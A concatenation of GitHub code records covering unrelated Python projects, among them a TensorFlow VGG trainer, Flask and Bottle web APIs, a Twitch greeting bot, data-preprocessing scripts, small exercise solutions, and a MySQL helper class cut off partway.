args[\"open_doors\"]:\n simplifications.append(\"openDoors\")\n\n if args[\"no_electrical\"]:\n simplifications.append(\"noElectricalAction\")\n\n return args[\"simplifications_preset\"] or \",\".join(simplifications)\n\n#\n# Parse command line arguments\n#\ndef parse_args():\n desc = \"Play through a game using the console.\"\n parser = argparse.ArgumentParser(desc)\n parser.add_argument(\"--jar_path\", type=str,\n help=\"Path to the ScienceWorld jar file. Default: use builtin.\")\n parser.add_argument(\"--task-num\", type=int, default=13,\n help=\"Specify the task number to play. Default: %(default)s\")\n parser.add_argument(\"--var-num\", type=int, default=0,\n help=\"Specify the task variation number to play. Default: %(default)s\")\n parser.add_argument(\"--env-step-limit\", type=int, default=100,\n help=\"Maximum number of steps per episode. Default: %(default)s\")\n parser.add_argument(\"--num-episodes\", type=int, default=5,\n help=\"Number of episodes to play. 
Default: %(default)s\")\n\n    simplification_group = parser.add_argument_group('Game simplifications')\n    simplification_group.add_argument(\"--simplifications-preset\", choices=['easy'],\n                                      help=\"Choose a preset among: 'easy' (apply all possible simplifications).\")\n    simplification_group.add_argument(\"--teleport\", action=\"store_true\",\n                                      help=\"Lets agents instantly move to any location.\")\n    simplification_group.add_argument(\"--self-watering-plants\", action=\"store_true\",\n                                      help=\"Plants do not have to be frequently watered.\")\n    simplification_group.add_argument(\"--open-containers\", action=\"store_true\",\n                                      help=\"All containers are opened by default.\")\n    simplification_group.add_argument(\"--open-doors\", action=\"store_true\",\n                                      help=\"All doors are opened by default.\")\n    simplification_group.add_argument(\"--no-electrical\", action=\"store_true\",\n                                      help=\"Remove the electrical actions (reduces the size of the action space).\")\n\n    args = parser.parse_args()\n    params = vars(args)\n    return params\n\n\ndef main():\n    print(\"ScienceWorld 1.0 API Examples - Human\")\n\n    # Parse command line arguments\n    args = parse_args()\n    args[\"simplification_str\"] = build_simplification_str(args)\n    userConsole(args)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"allenai/ScienceWorld","sub_path":"examples/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"72"} +{"seq_id":"17418047721","text":"import os\nimport tensorflow as tf\nimport numpy as np\nos.environ['CUDA_VISIBLE_DEVICES'] = '0, 1, 2'\n\n\"\"\"\ntrain the dataset from scratch\n\"\"\"\n# Image Parameters\nN_CLASSES = 2  # CHANGE HERE, total number of classes\nIMG_HEIGHT = 224  # CHANGE HERE, the image height to be resized to\nIMG_WIDTH = 224  # CHANGE HERE, the image width to be resized to\nCHANNELS = 3  # The 3 color channels, change to 1 if grayscale\nn_classes = N_CLASSES  # total number of classes (here: dog vs. cat)\ndropout = 0.15\nnum_steps = 5000\ntrain_display = 100\nval_display = 1000\nlearning_rate = 1e-5\nBATCHSIZE = 32\nsave_check = 1000\n\n\ndef _parse_function(record):\n    keys_to_features = {\n        'img_raw': tf.FixedLenFeature((), tf.string),\n        'label': tf.FixedLenFeature((), tf.int64)\n    }\n    parsed = tf.parse_single_example(record, keys_to_features)\n    image = tf.decode_raw(parsed['img_raw'], tf.uint8)\n    image = tf.reshape(image, [IMG_HEIGHT, IMG_WIDTH, 3])\n    image = tf.cast(image, tf.float32)\n    image = image/255.0\n    image = image - 0.5\n    image = image * 2.0\n    label = tf.cast(parsed['label'], tf.int32)\n    return image, label\n\n\n# train data pipeline\n# repeat -> shuffle and shuffle -> repeat are not equivalent\ntraindata = tf.data.TFRecordDataset(\"../datasets/dog_cat/train_dog_cat_224.tfrecord\").\\\n    map(_parse_function).\\\n    shuffle(buffer_size=2000, reshuffle_each_iteration=True).\\\n    batch(BATCHSIZE).\\\n    repeat().\\\n    prefetch(BATCHSIZE)\n\n# val data pipeline\nvaldata = tf.data.TFRecordDataset(\"../datasets/dog_cat/test_dog_cat_224.tfrecord\").\\\n    map(_parse_function).\\\n    batch(BATCHSIZE).\\\n    repeat().\\\n    prefetch(BATCHSIZE)\n# Create an iterator over the dataset\n\nis_training = tf.placeholder(tf.bool)\niterator = tf.data.Iterator.from_structure(traindata.output_types, traindata.output_shapes)\nX, Y = iterator.get_next()\n\ntraindata_init = iterator.make_initializer(traindata)\nvaldata_init = iterator.make_initializer(valdata)\n
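\n# --- Editorial sketch (added by the editor, not part of the original file): with a\n# reinitializable iterator, switching pipelines only means re-running the matching\n# init op; X and Y stay the same graph tensors either way.\ndef switch_dataset(sess, dataset_init_op):\n    \"\"\"Point the shared iterator at another dataset, e.g. switch_dataset(sess, valdata_init).\"\"\"\n    sess.run(dataset_init_op)\n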
\n\ndef check_accuracy(sess, correct_prediction, dataset_init_op, batches_to_check):\n    # Initialize the validation dataset\n    sess.run(dataset_init_op)\n    num_correct, num_samples = 0, 0\n    for i in range(batches_to_check):\n        try:\n            correct_pred = sess.run(correct_prediction, {is_training: False})\n            num_correct += correct_pred.sum()\n            num_samples += correct_pred.shape[0]\n        except tf.errors.OutOfRangeError:\n            break\n\n    # Return the fraction of datapoints that were correctly classified\n    acc = float(num_correct) / num_samples\n    return acc\n\n\n# Define the network\ndef conv_net(x, n_classes, dropout, reuse, is_training=is_training):\n    # Define a scope for reusing the variables\n    with tf.variable_scope('ConvNet', reuse=reuse):\n        # Stacked 3x3 convolution blocks (VGG-16 layout)\n        # x = tf.reshape(x, shape=[-1, 64, 64, 3])\n        conv1 = tf.layers.conv2d(x, 64, 3, padding='same', activation=tf.nn.relu)\n        conv1_1 = tf.layers.conv2d(conv1, 64, 3, padding='same', activation=tf.nn.relu)\n        pool1 = tf.layers.max_pooling2d(conv1_1, 2, 2)\n\n        conv2_1 = tf.layers.conv2d(pool1, 128, 3, padding='same', activation=tf.nn.relu)\n        conv2_2 = tf.layers.conv2d(conv2_1, 128, 3, padding='same', activation=tf.nn.relu)\n        pool2 = tf.layers.max_pooling2d(conv2_2, 2, 2)\n\n        conv3_1 = tf.layers.conv2d(pool2, 256, 3, padding='same', activation=tf.nn.relu)\n        conv3_2 = tf.layers.conv2d(conv3_1, 256, 3, padding='same', activation=tf.nn.relu)\n        conv3_3 = tf.layers.conv2d(conv3_2, 256, 3, padding='same', activation=tf.nn.relu)\n        pool3 = tf.layers.max_pooling2d(conv3_3, 2, 2)\n\n        conv4_1 = tf.layers.conv2d(pool3, 512, 3, padding='same', activation=tf.nn.relu)\n        conv4_2 = tf.layers.conv2d(conv4_1, 512, 3, padding='same', activation=tf.nn.relu)\n        conv4_3 = tf.layers.conv2d(conv4_2, 512, 3, padding='same', activation=tf.nn.relu)\n        pool4 = tf.layers.max_pooling2d(conv4_3, 2, 2)\n\n        conv5_1 = tf.layers.conv2d(pool4, 512, 3, padding='same', activation=tf.nn.relu)\n        conv5_2 = tf.layers.conv2d(conv5_1, 512, 3, padding='same', activation=tf.nn.relu)\n        conv5_3 = tf.layers.conv2d(conv5_2, 512, 3, padding='same', activation=tf.nn.relu)\n        pool5 = tf.layers.max_pooling2d(conv5_3, 2, 2)\n        fc1 = tf.contrib.layers.flatten(pool5)\n\n        # Fully connected layer (in contrib folder for now)\n        fc1 = tf.layers.dense(fc1, 4096)\n        fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n        fc1 = tf.layers.dense(fc1, 4096)\n        fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n        out = tf.layers.dense(fc1, n_classes)\n        return out\n\n\n# Create a graph for training\nlogits_train = conv_net(X, N_CLASSES, dropout=0.5, reuse=False, is_training=True)\n# Create another graph for testing that reuses the same weights; note that dropout is disabled at test time\nlogits_test = conv_net(X, N_CLASSES, dropout=0.0, reuse=True, is_training=False)\n\n# Define loss and optimizer (with train logits, for dropout to take effect)\nloss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits_train, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n# Evaluate model (with test logits, for dropout to be disabled)\nlogits_test = tf.nn.softmax(logits_test)\ncorrect_pred = tf.equal(tf.argmax(logits_test, 1), tf.cast(Y, tf.int64))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n
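\n# --- Editorial sketch (added by the editor; an assumption, not from the original\n# repo): because the second conv_net call passes reuse=True, it looks up the variables\n# created by the first call instead of allocating new ones. This helper makes that\n# observable: the returned list does not grow after the reuse=True call.\ndef convnet_variable_names():\n    \"\"\"List the names of all variables created under the 'ConvNet' scope.\"\"\"\n    return [v.name for v in tf.global_variables() if v.name.startswith('ConvNet')]\n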
\n# Initialize the variables (i.e. assign their default value)\ninit = tf.global_variables_initializer()\n\n# Start training\n# Initialize the iterator\nwith tf.Session() as sess:\n    # sess.run(iterator.initializer)\n    sess.run(init)\n    sess.run(traindata_init)\n    saver = tf.train.Saver(max_to_keep=3)\n    ckpt = tf.train.get_checkpoint_state('./model_vgg')\n    if ckpt is None:\n        print(\"Model not found, please train your model first...\")\n    else:\n        path = ckpt.model_checkpoint_path\n        print('loading pre-trained model from %s.....' % path)\n        saver.restore(sess, path)\n    # Training cycle\n    for step in range(1, num_steps + 1):\n        loss, acc, _ = sess.run([loss_op, accuracy, train_op], {is_training: True})\n        if step % train_display == 0 or step == 1:\n            # Run optimization and calculate batch loss and accuracy\n            print(\"Step \" + str(step) + \", Minibatch Loss= \" + \"{:.4f}\".format(loss) + \", Training Accuracy= \" +\n                  \"{:.3f}\".format(acc))\n\n        if step % val_display == 0 and step != 0:\n            sess.run(valdata_init)\n            acc = check_accuracy(sess, correct_pred, valdata_init, val_display)\n            loss = sess.run(loss_op, {is_training: False})\n            print(\"\\033[1;36m=\\033[0m\"*60)\n            print(\"\\033[1;36mStep %d, Minibatch Loss= %.4f, Test Accuracy= %.4f\\033[0m\" % (step, loss, acc))\n            print(\"\\033[1;36m=\\033[0m\"*60)\n\n        if step % 1000 == 0:\n            path_name = \"./model_vgg/model\" + str(step) + \".ckpt\"\n            print(path_name)\n            saver.save(sess, path_name)\n            print(\"model has been saved\")\n\n    print(\"Optimization Finished!\")\n","repo_name":"bruce1408/Tensorflow_learning","sub_path":"week06/src/6_15_VGG_train.py","file_name":"6_15_VGG_train.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42231549394","text":"#!/usr/bin/python3\n\n\ndef add_tuple(tuple_a=(), tuple_b=()):\n    # add two tuples' values element-wise\n    newt1 = (0, 0)\n    newt2 = (0, 0)\n\n    # check len & value of t_a\n    if len(tuple_a) == 1:\n        newt1 = (tuple_a[0], 0)\n    elif len(tuple_a) >= 2:\n        newt1 = (tuple_a[0], tuple_a[1])\n\n    # check len & value of t_b\n    if len(tuple_b) == 1:\n        newt2 = (tuple_b[0], 0)\n    elif len(tuple_b) >= 2:\n        newt2 = (tuple_b[0], tuple_b[1])\n\n    # return new tuple\n    return (newt1[0] + newt2[0], newt1[1] + newt2[1])\n","repo_name":"conkobar/holbertonschool-higher_level_programming","sub_path":"0x02-python-data_structures/7-add_tuple.py","file_name":"7-add_tuple.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35129354818","text":"\nfrom flask import Flask, jsonify\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/buy')\ndef buy():\n    r = requests.get('https://api.exchangeratesapi.io/latest')\n    json = r.json()\n    rates_object = json['rates']\n    buy_rates = {}\n    for key, value in rates_object.items():\n        cost = value / 100 * 2\n        buy_rates[key] = round(value + cost, 5)\n    return jsonify(buy_rates)\n\n@app.route('/sell')\ndef sell():\n    r = requests.get('https://api.exchangeratesapi.io/latest')\n    json = r.json()\n    rates_object = json['rates']\n    sell_rates = {}\n    for key, value in rates_object.items():\n        cost = value / 100 * 2\n        sell_rates[key] = round(value - cost, 5)\n    return jsonify(sell_rates)\n\n\nif __name__ == \"__main__\":\n    
app.run(debug=True)\n\n","repo_name":"IvanPetrushevski/exchange-rates-api","sub_path":"hello_flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72484535272","text":"import glob, os, chemistry\nimport networkx\nimport mdtraj as md\n\nfilenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/*.prmtop\")\n#filenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/57-55-6_1000_313.2*.prmtop\")\nfilenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/121182*.prmtop\")\n#filenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/126492-54-4_1000_315*.prmtop\")\n\nfor filename in filenames:\n base = os.path.splitext(os.path.split(filename)[-1])[0]\n prmtop_filename = \"/home/kyleb/lb_benchmark_openmoltools/tleap/\" + base + \".prmtop\"\n inpcrd_filename = \"/home/kyleb/lb_benchmark_openmoltools/tleap/\" + base + \".inpcrd\"\n print(prmtop_filename, inpcrd_filename)\n prmtop0 = chemistry.load_file(prmtop_filename)\n t0 = md.load(inpcrd_filename, top=prmtop_filename)\n t0 = t0.atom_slice(t0.top.select(\"resSeq 0\"))\n prmtop_filename = \"/home/kyleb/liquid_benchmark_3_14//tleap/\" + base + \".prmtop\"\n inpcrd_filename = \"/home/kyleb/liquid_benchmark_3_14//tleap/\" + base + \".inpcrd\"\n prmtop1 = chemistry.load_file(prmtop_filename)\n t1 = md.load(inpcrd_filename, top=prmtop_filename)\n t1 = t1.atom_slice(t1.top.select(\"resSeq 0\"))\n top0 = prmtop0.to_dataframe()\n top0 = top0[top0.resid == 0]\n top1 = prmtop1.to_dataframe()\n top1 = top1[top1.resid == 0]\n b0 = t0.top.to_dataframe()[1]\n b1 = t1.top.to_dataframe()[1]\n g0 = networkx.from_edgelist(b0)\n g1 = networkx.from_edgelist(b1)\n for i in range(len(g0.nodes())):\n node = g0.node[i]\n node[\"charge\"] = top0.charge[i]\n node[\"gafftype\"] = top0.type[i] \n for i in range(len(g1.nodes())):\n node = g1.node[i]\n node[\"charge\"] = top1.charge[i]\n node[\"gafftype\"] = top1.type[i]\n epsilon = 1E-1\n node_match = lambda x, y: (x[\"gafftype\"] == y[\"gafftype\"]) and (abs(x[\"charge\"] - y[\"charge\"]) < epsilon)\n matcher = networkx.isomorphism.GraphMatcher(g0, g1, node_match=node_match)\n matcher.is_isomorphic()\n mapping = matcher.mapping\n mapping\n inv_mapping = {val:key for key, val in mapping.items()}\n\n top1[\"newind\"] = top1.index.map(lambda x: inv_mapping[x])\n remapped = top1.set_index(\"newind\").sort_index()\n remapped[\"top0\"] = top0[\"charge\"]\n remapped[\"delta\"] = remapped.charge - remapped.top0\n print(remapped.delta.mean(), remapped.delta.std(), remapped.delta.max(), remapped.delta.min())\n\n\ntop0[[\"name\", \"type\", \"charge\"]]\nremapped[[\"name\", \"type\", \"charge\", \"top0\", \"delta\"]]\n","repo_name":"choderalab/LiquidBenchmark","sub_path":"src/misc/old/test_charges_after_gaff2xml_patch.py","file_name":"test_charges_after_gaff2xml_patch.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42385812648","text":"\"\"\"\nTest some jax functionality\n\"\"\"\n\nimport jax\nimport jax.numpy as jnp\nimport pytest\nfrom jax import random\n\n\ndef test_jax_cpu():\n \"\"\"Test wether jax can run on the cpu by executing some jax code\"\"\"\n jax.default_device = jax.devices(\"cpu\")[0]\n do_matrix_multiplication()\n\n\n@pytest.mark.xfail(\n jax.default_backend()\n == \"cpu\", # Jax uses gpu per default if available. 
So we can check whether a GPU is available by checking the default backend\n    reason=\"XFAIL means that no GPU was visible to jax or the matrix multiplication failed, maybe jax[cuda] or cuda + cudnn not installed\",\n)\ndef test_jax_gpu():\n    \"\"\"Test whether jax can run on the gpu by executing some jax code.\n    The jax gpu test may fail if no nvidia gpu is available or the cuda and cudnn libraries are not installed.\n\n    Args:\n\n    Returns:\n\n    \"\"\"\n    jax.default_device = jax.devices(\"gpu\")[0]\n    do_matrix_multiplication()\n\n\n# The random part would be different if using numpy\ndef do_matrix_multiplication(n: int = 20):\n    \"\"\"Do a simple matrix-matrix multiplication for two random matrices generated by jax\n\n    Args:\n        n(int, optional): number of entries per dimension, defaults to 20\n\n    Returns:\n\n    \"\"\"\n    key = random.PRNGKey(0)  # Not really random ;) [0,0] But gives reproducible results\n    keyx, keyy = random.split(key)\n    xj = random.normal(keyx, (n, n))\n    yj = random.normal(keyy, (n, n))\n\n    zj = jnp.dot(xj, yj)\n","repo_name":"Systems-Theory-in-Systems-Biology/EPI","sub_path":"tests/test_jax.py","file_name":"test_jax.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"} +{"seq_id":"24961370020","text":"from flask import Blueprint,request\nfrom database.post_service import get_all_posts_db,get_exact_post_db,delete_exact_post_db,change_post_text_db, add_new_post_db,post_new_photo_db,create_post_for_hashtag\npost_bp = Blueprint('user_post',__name__,url_prefix='/post')\n\n# get all posts\n@post_bp.route('/',methods=['GET'])\ndef get_all_user_posts():\n    all_posts = get_all_posts_db()\n\n    if all_posts:\n        return {'status':1,'message':all_posts}\n    return {'status':0, 'message':'Not found'}\n\n# get a specific post\n@post_bp.route('/<int:post_id>',methods=['GET'])\ndef get_exact_post(post_id : int):\n    exact_post = get_exact_post_db(post_id)\n\n    if exact_post:\n        return {'status':1,'message':exact_post}\n    return {'status':0,'message':'Not found'}\n\n# change user's post\n@post_bp.route('/<int:post_id>',methods=['PUT'])\ndef change_user_post(post_id : int):\n    new_post_text = request.json.get('new_post_text')\n\n    change_post_text_db(post_id, new_post_text)\n\n    return {'status': 1, 'message': 'Changed'}\n\n# delete user's post\n@post_bp.route('/<int:user_id>/<int:post_id>',methods=['DELETE'])\ndef delete_user_post(user_id : int, post_id : int):\n    delete_post = delete_exact_post_db(post_id, user_id)\n\n    if delete_post:\n        return {'status':1,'message':'post deleted'}\n    return {'status': 0, 'message': 'Not Found'}\n\n\n# publish post\n@post_bp.route('/upload_post',methods=['POST'])\ndef create_post(post_text : str, user_id : int):\n    # get the uploaded photo from the front end\n    file = request.files.get('post_photo','')\n    file.save(f'user_images/{file.filename}')\n\n    # get the hashtags from the front end\n    hashtags = request.json.get('hashtags')\n\n    # save the photo id to the database\n    new_photo_id = post_new_photo_db(user_id, file.filename)\n\n    # save the post\n    new_post = add_new_post_db(user_id = user_id , photo_id=new_photo_id,post_text=post_text)\n    if hashtags:\n        create_post_for_hashtag(new_post,hashtags)\n\n    return {'status':1,'message':'Post created'}\n","repo_name":"AmirShaymardanov23/Social","sub_path":"posts/posts_api.py","file_name":"posts_api.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42765786084","text":"# coding: utf-8\nfrom json import dumps\nimport datetime, os\n\nimport requests\nfrom bottle import Bottle, request, response\nfrom PIL import Image, ImageFile\n\nfrom inception_v3 import run_inference_on_image\n\n# also load TRUNCATED images\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n# multiple POSTs can arrive at once, so put a timestamp into the tmp file name\nTMP_IMAGE = '/tmp/inception_tmp_{}.jpg'\n\ninception_app = Bottle()\n\n\n# classify an image whose url is passed via GET. ContentType:multipart/form-data\n@inception_app.get('/inception')\ndef get_inception():\n    # request image url (local name 'res' avoids shadowing bottle's response object)\n    res = requests.get(request.params.image, stream=True)\n\n    path = image_path()\n\n    # save image\n    with open(path, 'wb') as file:\n        for chunk in res.iter_content(chunk_size=1024):\n            file.write(chunk)\n\n    # scan\n    result = inception_scan(path)\n\n    response.content_type = 'application/json'\n    return dumps(result)\n\n\n# classify an image passed as binary via POST. ContentType:multipart/form-data\n@inception_app.post('/inception')\ndef post_inception():\n    # request image binary\n    image = request.files.get('image')\n\n    path = image_path()\n\n    # save image\n    image.save(path, overwrite=True, chunk_size=1024)\n\n    # scan\n    result = inception_scan(path)\n\n    response.content_type = 'application/json'\n    return dumps(result)\n
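\n\n# --- Editorial note (added by the editor; host/port and file name are assumptions,\n# not from the original repo): with the app served on bottle's default port, the two\n# handlers above can be smoke-tested with\n#   curl 'http://localhost:8080/inception?image=http://example.com/cat.jpg'\n#   curl -F 'image=@cat.jpg' http://localhost:8080/inception\n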
\n\n# view for testing the API by hand\n@inception_app.get('/inception/test')\ndef get_inception_test():\n    return '''\n
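    <!-- Editorial note (added): minimal upload form; the POST handler reads the multipart field named \"image\". -->\n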
    <form action=\"/inception\" method=\"post\" enctype=\"multipart/form-data\">\n        <input type=\"file\" name=\"image\">\n        <input type=\"submit\" value=\"scan\">\n    </form>\n
      \n'''\n\n\ndef image_path():\n now = datetime.datetime.utcnow().strftime(\"%Y-%m-%d_%H:%M:%S.%f\")\n return TMP_IMAGE.format(now)\n\ndef convert(path, format='jpeg'):\n image = Image.open(path)\n image.save(path, format)\n\ndef inception_scan(path):\n # convert jpeg\n convert(path, 'jpeg')\n # classify image\n result = run_inference_on_image(path)\n # delete tmp image\n os.remove(path)\n\n return result\n","repo_name":"arakawamoriyuki/ml_study","sub_path":"anaconda_bottle/app/inception.py","file_name":"inception.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21056401926","text":"import pickle\nimport pandas as pd\nimport re\ndef to_df(file_path):\n with open(file_path, 'r') as fin:\n df = {}\n i = 0\n for line in fin:\n line = re.sub(\"\\\"verified\\\"\\: true,\",'',line)\n line = re.sub(\"\\\"verified\\\"\\: false,\",'',line)\n df[i] = eval(line)\n i += 1\n df = pd.DataFrame.from_dict(df, orient='index')\n return df\n\n\nreviews_df = to_df('ft_local/CDs_and_Vinyl_5.json')\n\nwith open('dataset/reviews_CDs.pkl', 'wb') as f:\n pickle.dump(reviews_df, f, pickle.HIGHEST_PROTOCOL)\n\nmeta_df = to_df('ft_local/meta_CDs_and_Vinyl.json')\nmeta_df = meta_df[meta_df['asin'].isin(reviews_df['asin'].unique())]\nmeta_df = meta_df.reset_index(drop=True) \nwith open('dataset/meta_CDs.pkl', 'wb') as f:\n pickle.dump(meta_df, f, pickle.HIGHEST_PROTOCOL)\n\n\n","repo_name":"Scarlett2333/autofuse","sub_path":"data_preprocess/1_format_process.py","file_name":"1_format_process.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15926822098","text":"import collections\nimport csv\nimport re\n\nSequence = collections.namedtuple(\"sequence\", [\"taxon\", \"sequence\"])\n\n\ndef read_fasta_sequences(filename: str) -> list[Sequence]:\n sequences = {}\n with open(filename, \"r\") as fp:\n for line in fp:\n line = line.strip()\n if line.startswith(\">\"):\n taxon = line[1:]\n sequences[taxon] = \"\"\n else:\n sequences[taxon] += line\n return [Sequence(taxon, sequence) for taxon, sequence in sequences.items()]\n\n\ndef convert_date_to_real(day, month, year):\n if year % 4 == 0:\n days = (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n else:\n days = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n\n for i in range(month - 1):\n day += days[i]\n\n return (day - 1) / sum(days) + year\n\n\ndef read_dates_from_csv(input_file, date_format=None):\n dates = {}\n with open(input_file) as fp:\n reader = csv.reader(\n fp,\n quotechar='\"',\n delimiter=\",\",\n quoting=csv.QUOTE_ALL,\n skipinitialspace=True,\n )\n for line in reader:\n index_name = line.index(\"strain\")\n index_date = line.index(\"date\")\n break\n for line in reader:\n dates[line[index_name]] = line[index_date]\n\n if date_format is not None:\n res = re.split(r\"[/-]\", date_format)\n yy = res.index(\"yyyy\")\n MM = res.index(\"MM\")\n dd = res.index(\"dd\")\n\n for key, date in dates.items():\n res1 = re.split(r\"[/-]\", date)\n dates[key] = convert_date_to_real(\n int(res1[dd]), int(res1[MM]), int(res1[yy])\n )\n return dates\n","repo_name":"4ment/physher","sub_path":"python/physhpy/cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"30502864172","text":"import socket, ssl, json\n#twitch greeting 
bot\n\n# build a socket which can connect to the twitch irc chat server, using the modules socket and ssl\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nirc = ssl.wrap_socket(sock)\nip, port = \"irc.chat.twitch.tv\", 6697\nirc.connect((ip, port))\n\n# define a chat_user list to check if users are not in the list and greet them.\nchat_user = []\n\n# load the json config file to get the username, oauth token and channel\nfile = r\"C:\\Users\\PC\\Desktop\\fiverr\\config.json\"\nwith open(file, \"r\") as f:\n    data = json.load(f)\n\n# define vars. from the data of the config\nname = data[\"username\"]\nchannel = data[\"channel\"]\ntoken = data[\"token\"]\n\n\nclass bot:\n    # send method to send messages to the irc server, not the chat\n    def send(self, irc, message):\n        irc.send(bytes(f\"{message}\\r\\n\", \"utf8\"))\n\n    # this method is just for sending messages in the twitch chat\n    def send_chat(self, irc, message):\n        self.send(irc, f\"PRIVMSG #{channel} :{message}\")\n\n    # method to handle the chat messages and do something\n    def commands(self, irc, message):\n        args = [str(message[i]) for i in range(len(message)) if i > 2]  # list comp to get the args of the chat message\n        args[0] = args[0].replace(\":\", \"\")\n\n        user = message[0].split(\"!\")[0].replace(\":\", \"\")\n        if user not in chat_user:\n            chat_user.append(user)\n            self.send_chat(irc, f\"Welcome to the stream @{user}\")\n\n    # method to start the twitch bot\n    def start(self):\n        self.send(irc, f\"PASS {token}\")\n        self.send(irc, f\"NICK {name}\")\n        self.send(irc, f\"JOIN #{channel}\")\n\n        while True:\n            data = irc.recv(1024).decode(\"utf8\")\n            message = data.split()\n            if message[1] == \"PRIVMSG\":\n                self.commands(irc, message)\n            for line in data.splitlines():\n                if line == \"PING :tmi.twitch.tv\":\n                    self.send(irc, \"PONG\")\n                print(line)\n\n# define an instance of the bot class to start the bot\nBot = bot()\nif __name__ == \"__main__\":\n    Bot.start()\n","repo_name":"Karpfen11/twitch-greeting-bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3345366607","text":"class Solution:\r\n    def topKFrequent(self, words, k: int):\r\n        dic = {}\r\n        for i in range(0, len(words)):\r\n            dic[words[i]] = dic.get(words[i], 0) + 1\r\n        res = []\r\n        for i in dic.keys():\r\n            res.append([i, dic[i]])\r\n        res.sort(key=lambda x: (-x[1], x[0]))  # sort by frequency descending, then alphabetically ascending\r\n        result = []\r\n        for i in range(k):\r\n            result.append(res[i][0])\r\n        return result\r\n\r\n\r\nprint(Solution().topKFrequent([\"i\", \"love\", \"leetcode\", \"i\", \"love\", \"coding\"], 2))\r\nprint(Solution().topKFrequent([\"the\", \"day\", \"is\", \"sunny\", \"the\", \"the\", \"the\", \"sunny\", \"is\", \"is\"], 4))\r\n","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Other/692.topKFrequent.py","file_name":"692.topKFrequent.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1128951873","text":"size, walls = [int(i) for i in input().split()]\nparts = [int(i) for i in input().split()]\nparts.append(size)\nparts.insert(0, 0)\nconfigs = set()\n\nfor i in range(walls + 1):\n    for j in range(i + 1, walls + 2):\n        configs.add(parts[j] - parts[i])\n\nprint(\" \".join([str(i) for i in sorted(configs)]))
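\n# Editorial note (added): the nested loops enumerate every pair of wall positions\n# (including the two outer edges appended above), so 'configs' ends up holding each\n# achievable room width exactly once, in O((walls + 2)^2) time, before the sorted print.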
\n\n","repo_name":"Hexfall/Kattis","sub_path":"flexible.py","file_name":"flexible.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39658109788","text":"# module defines operations to use with sql database - adapted from Sierra Clibourne's SQLLite db_operations\nimport mysql.connector\nimport time\nimport datetime\n\nclass sql_operations():\n def __init__(self):\n try:\n global mydb\n # REPLACE THE PASSWORD WITH YOUR ROOT SQL PASSWORD\n mydb = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"monSQL92610@\",\n auth_plugin='mysql_native_password', database='teacher_timesheet')\n\n # create cursor obj to interact with mySQL\n self.cursor = mydb.cursor()\n\n # create teacher timesheet schema\n # self.cursor.execute(\"CREATE SCHEMA teacher_timesheet\")\n # self.cursor.execute(\"SHOW DATABASES\")\n # for x in self.cursor:\n # print(x)\n\n # print(\"SQL CONNECTION SUCCESSFUL.\\n\")\n except:\n print(\"SQL CONNECTION FAILED.\\n\")\n\n # function for bulk inserting records\n def bulk_insert(self, query, records):\n self.cursor.executemany(query, records)\n mydb.commit()\n #print(\"query executed..\")\n \n # function for inserting one record\n def insert(self, query):\n self.cursor.execute(query)\n mydb.commit()\n #print(\"query executed..\")\n \n # function to return a single value from table\n def single_record(self, query):\n self.cursor.execute(query)\n return self.cursor.fetchone()[0]\n\n # function to return a single record from table\n def single_row(self, query):\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n # function to return a single attribute values from table\n def single_attribute(self, query):\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n results = [i[0] for i in results]\n try:\n results.remove(None)\n except:\n pass\n return results\n\n # SELECT with named placeholders\n def name_placeholder_query(self, query, dictionary):\n self.cursor.execute(query, dictionary)\n results = self.cursor.fetchall()\n results 